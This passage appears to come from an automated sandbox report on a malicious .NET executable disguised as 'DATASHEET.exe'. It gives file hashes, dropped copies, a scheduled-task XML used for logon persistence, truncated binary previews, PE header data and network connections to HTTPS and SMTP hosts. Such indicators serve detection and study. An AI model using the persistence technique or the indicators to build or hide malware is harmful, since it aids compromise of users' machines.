                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:data
                                                                                                        Category:modified
                                                                                                        Size (bytes):2232
                                                                                                        Entropy (8bit):5.380134126512796
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:+WSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//MPUyus:+LHxvIIwLgZ2KRHWLOugss
                                                                                                        MD5:1EAEAFD7273274CDA83D273067B943D3
                                                                                                        SHA1:C866E2FAAE80546EB4C6471808DB0594AD65BD30
                                                                                                        SHA-256:B9F349DE2AEF9F4F3B1605CCAA89F9DE14F9DAEBF9FC5D596F4FF776534BF2A6
                                                                                                        SHA-512:FB173F980E666497B9AB18A605CBBC7BE2B23456ED39DF44591486A6610E1EDAD28DE5CB315263861F4558F2262A7168A0780C6EB65253362D15A43176679847
                                                                                                        Malicious:false
                                                                                                        Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0idfn5sd.sey.psm1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ohgw5pf.2pt.ps1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_foo002tp.i5k.ps1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qfghmcx1.3of.psm1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r5k3ypuk.01i.ps1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xmbm2xhz.loo.psm1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xxrvomvr.trt.ps1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yonm3dkw.rzk.psm1

                                                                                                        Download File
                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):60
                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                        Malicious:false
                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                        C:\Users\user\AppData\Local\Temp\tmp8AFA.tmp

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\Desktop\DATASHEET.exe
                                                                                                        File Type:XML 1.0 document, ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1580
                                                                                                        Entropy (8bit):5.124772361783954
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaTxvn:cge1wYrFdOFzOzN33ODOiDdKrsuT4v
                                                                                                        MD5:09036EF3456D543CE31A56289324D9F3
                                                                                                        SHA1:7525338CEB3DC4235B451CDCD67A39EC53D00D78
                                                                                                        SHA-256:562F80F1234331053654C4B89A7E49356DBAD1373055AC39CEFB398F92F7A77F
                                                                                                        SHA-512:C3756AF8236B5BA57142E82E92F188CEFC54CA2A61EC705E050233032567B33FD252CF2B39C03501BB19895ECDCEC7B0511C167566DA8A87305C33CA69838A98
                                                                                                        Malicious:true
                                                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                                        C:\Users\user\AppData\Local\Temp\tmp9C6E.tmp

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exe
                                                                                                        File Type:XML 1.0 document, ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1580
                                                                                                        Entropy (8bit):5.124772361783954
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaTxvn:cge1wYrFdOFzOzN33ODOiDdKrsuT4v
                                                                                                        MD5:09036EF3456D543CE31A56289324D9F3
                                                                                                        SHA1:7525338CEB3DC4235B451CDCD67A39EC53D00D78
                                                                                                        SHA-256:562F80F1234331053654C4B89A7E49356DBAD1373055AC39CEFB398F92F7A77F
                                                                                                        SHA-512:C3756AF8236B5BA57142E82E92F188CEFC54CA2A61EC705E050233032567B33FD252CF2B39C03501BB19895ECDCEC7B0511C167566DA8A87305C33CA69838A98
                                                                                                        Malicious:false
                                                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                                        C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exe

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\Desktop\DATASHEET.exe
                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Category:dropped
                                                                                                        Size (bytes):646144
                                                                                                        Entropy (8bit):7.969702317694796
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:f5AgFd918tPwTfYq1ZtoMxf5Cs814Aq/EamrnJuiu01x/pC9:hAg6wEMZtoMSs8DeEamlxxC
                                                                                                        MD5:8B627084E10AD9B77436A4C3D8EA5EBB
                                                                                                        SHA1:7DB5EE2AB5FDC91FA29A521F7F9779684F9E4ABD
                                                                                                        SHA-256:10F6D70D363D93FCE85E92F2EA94A36EDA4C755606581CD101652AFAA97A91FC
                                                                                                        SHA-512:45CCB2DE3D572D2244F4676322834DDF8BF003FF7E4955BF5510FF082AA42CD1B519C6B9EE43DBAD5EEF6AF96C6B5C6E8121E5CE0779AA4F1834BD1BBB57035F
                                                                                                        Malicious:true
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                        • Antivirus: ReversingLabs, Detection: 55%
                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.............*.... ........@.. .......................@............@.....................................O.......4.................... ..........p............................................ ............... ..H............text...0.... ...................... ..`.rsrc...4...........................@..@.reloc....... ......................@..B........................H.......p>...E..........x... R...........................................0..N........s....}.....s....}.....s....}.....r...p}.....r...p}......}.....(.......(.....*...0..6..............,..{....r!..po.....+.......,..{....rY..po.....*...0............{....r{..po......{.....o.....r...ps...........(....(.....+3..o........4...%..,.o.....s..........{......o.......o ..........-.....,..o!........+...*.........*.X.........*..0..n........s"......o#....+B..($........do%......F.........,...

                                                                                                        C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exe:Zone.Identifier

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\Desktop\DATASHEET.exe
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):26
                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                        Malicious:true
                                                                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                                                                        Static File Info

                                                                                                        General

                                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                        Entropy (8bit):7.969702317694796
                                                                                                        TrID:
                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                                        File name:DATASHEET.exe
                                                                                                        File size:646'144 bytes
                                                                                                        MD5:8b627084e10ad9b77436a4c3d8ea5ebb
                                                                                                        SHA1:7db5ee2ab5fdc91fa29a521f7f9779684f9e4abd
                                                                                                        SHA256:10f6d70d363d93fce85e92f2ea94a36eda4c755606581cd101652afaa97a91fc
                                                                                                        SHA512:45ccb2de3d572d2244f4676322834ddf8bf003ff7e4955bf5510ff082aa42cd1b519c6b9ee43dbad5eef6af96c6b5c6e8121e5ce0779aa4f1834bd1bbb57035f
                                                                                                        SSDEEP:12288:f5AgFd918tPwTfYq1ZtoMxf5Cs814Aq/EamrnJuiu01x/pC9:hAg6wEMZtoMSs8DeEamlxxC
                                                                                                        TLSH:61D4231607A8BB61D8FEB374A02101AC533961906687F7FDCB4835CEBA1335256E5BF2
                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.............*.... ........@.. .......................@............@................................

                                                                                                        File Icon

                                                                                                        Icon Hash:90cececece8e8eb0

                                                                                                        Static PE Info

                                                                                                        General

                                                                                                        Entrypoint:0x49ee2a
                                                                                                        Entrypoint Section:.text
                                                                                                        Digitally signed:false
                                                                                                        Imagebase:0x400000
                                                                                                        Subsystem:windows gui
                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                        Time Stamp:0xAF0C1E0E [Tue Jan 23 19:42:06 2063 UTC]
                                                                                                        TLS Callbacks:
                                                                                                        CLR (.Net) Version:
                                                                                                        OS Version Major:4
                                                                                                        OS Version Minor:0
                                                                                                        File Version Major:4
                                                                                                        File Version Minor:0
                                                                                                        Subsystem Version Major:4
                                                                                                        Subsystem Version Minor:0
                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                        Entrypoint Preview

                                                                                                        Instruction
                                                                                                        jmp dword ptr [00402000h]
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al
                                                                                                        add byte ptr [eax], al

                                                                                                        Data Directories

                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x9edd80x4f.text
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xa00000x634.rsrc
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xa20000xc.reloc
                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x9d5980x70.text
                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                        Sections

                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                        .text0x20000x9ce300x9d000b7631219358bedd93b30795047933291False0.9783834469546179data7.976677778688236IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                        .rsrc0xa00000x6340x800bf7fdd4a9986b5d76188db67cfd83e69False0.3388671875data3.475103353345361IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        .reloc0xa20000xc0x200521661cee57067da55e1836aafd528faFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                        Resources

                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                        RT_VERSION0xa00900x3a4data0.41952789699570814
                                                                                                        RT_MANIFEST0xa04440x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                        Imports

                                                                                                        DLLImport
                                                                                                        mscoree.dll_CorExeMain

                                                                                                        Network Behavior

                                                                                                        Network Port Distribution

                                                                                                        TCP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Nov 21, 2024 09:04:31.228642941 CET49733443192.168.2.4172.67.74.152
                                                                                                        Nov 21, 2024 09:04:31.228702068 CET44349733172.67.74.152192.168.2.4
                                                                                                        Nov 21, 2024 09:04:31.228763103 CET49733443192.168.2.4172.67.74.152
                                                                                                        Nov 21, 2024 09:04:31.258532047 CET49733443192.168.2.4172.67.74.152
                                                                                                        Nov 21, 2024 09:04:31.258575916 CET44349733172.67.74.152192.168.2.4
                                                                                                        Nov 21, 2024 09:04:32.483295918 CET44349733172.67.74.152192.168.2.4
                                                                                                        Nov 21, 2024 09:04:32.483374119 CET49733443192.168.2.4172.67.74.152
                                                                                                        Nov 21, 2024 09:04:32.486423016 CET49733443192.168.2.4172.67.74.152
                                                                                                        Nov 21, 2024 09:04:32.486447096 CET44349733172.67.74.152192.168.2.4
                                                                                                        Nov 21, 2024 09:04:32.486807108 CET44349733172.67.74.152192.168.2.4
                                                                                                        Nov 21, 2024 09:04:32.577867985 CET49733443192.168.2.4172.67.74.152
                                                                                                        Nov 21, 2024 09:04:32.619333029 CET44349733172.67.74.152192.168.2.4
                                                                                                        Nov 21, 2024 09:04:32.913362026 CET44349733172.67.74.152192.168.2.4
                                                                                                        Nov 21, 2024 09:04:32.913424969 CET44349733172.67.74.152192.168.2.4
                                                                                                        Nov 21, 2024 09:04:32.913486004 CET49733443192.168.2.4172.67.74.152
                                                                                                        Nov 21, 2024 09:04:32.920281887 CET49733443192.168.2.4172.67.74.152
                                                                                                        Nov 21, 2024 09:04:33.770957947 CET49736587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:04:33.890481949 CET5874973677.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:04:33.890628099 CET49736587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:04:34.947654009 CET49737443192.168.2.4172.67.74.152
                                                                                                        Nov 21, 2024 09:04:34.947702885 CET44349737172.67.74.152192.168.2.4
                                                                                                        Nov 21, 2024 09:04:34.948476076 CET49737443192.168.2.4172.67.74.152
                                                                                                        Nov 21, 2024 09:04:34.951406002 CET49737443192.168.2.4172.67.74.152
                                                                                                        Nov 21, 2024 09:04:34.951419115 CET44349737172.67.74.152192.168.2.4
                                                                                                        Nov 21, 2024 09:04:35.161896944 CET5874973677.88.21.158192.168.2.4
                                                                                                        Nov 21, 2024 09:04:35.214493036 CET49736587192.168.2.477.88.21.158
                                                                                                        Nov 21, 2024 09:04:36.032977104 CET49736587192.168.2.477.88.21.158
